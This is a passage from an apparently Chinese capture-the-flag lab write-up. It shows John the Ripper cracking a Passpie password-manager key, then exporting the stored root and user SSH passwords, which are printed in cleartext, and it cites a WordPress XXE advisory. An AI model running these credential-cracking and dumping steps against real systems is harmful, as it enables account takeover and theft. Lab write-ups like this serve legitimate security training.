Cost 1 (s2k-count) is 65011712 for all loaded hashes
Cost 2 (hash algorithm [1:MD5 2:SHA1 3:RIPEMD160 8:SHA256 9:SHA384 10:SHA512 11:SHA224]) is 2 for all loaded hashes
Cost 3 (cipher algorithm [1:IDEA 2:3DES 3:CAST5 4:Blowfish 7:AES128 8:AES192 9:AES256 10:Twofish 11:Camellia128 12:Camellia192 13:Camellia256]) is 7 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
blink182 (Passpie)
1g 0:00:00:05 DONE (2022-11-20 00:47) 0.1937g/s 31.78p/s 31.78c/s 31.78C/s ginger..blink182
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
得到passpie的密码
查看passpie存放的密码
jnelson@meta2:~$ passpie list ╒════════╤═════════╤════════════╤═══════════╕ │ Name │ Login │ Password │ Comment │ ╞════════╪═════════╪════════════╪═══════════╡ │ ssh │ jnelson │ ******** │ │ ├────────┼─────────┼────────────┼───────────┤ │ ssh │ root │ ******** │ │ ╘════════╧═════════╧════════════╧═══════════╛ jnelson@meta2:~$ passpie export pass Passphrase: jnelson@meta2:~$ ls 1337 linpeas.sh pass pspy64s user.txt jnelson@meta2:~$ cat pass credentials: - comment: '' fullname: root@ssh login: root modified: 2022-06-26 08:58:15.621572 name: ssh password: !!python/unicode 'p7qfAZt4_A1xo_0x' - comment: '' fullname: jnelson@ssh login: jnelson modified: 2022-06-26 08:58:15.514422 name: ssh password: !!python/unicode 'Cb4_JmWM8zUZWMu@Ys' handler: passpie version: 1.0 jnelson@meta2:~$
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
- 16
- 17
- 18
- 19
- 20
- 21
- 22
- 23
- 24
- 25
- 26
- 27
- 28
- 29
参考文章
wordpress<= 5.7-xxe-cve-2021-29447
https://wpscan.com/vulnerability/388cd42d-b61a-42a4-8604-99b812db2357
本文内容由网友自发贡献,转载请注明出处:【wpsshop博客】
推荐阅读
相关标签
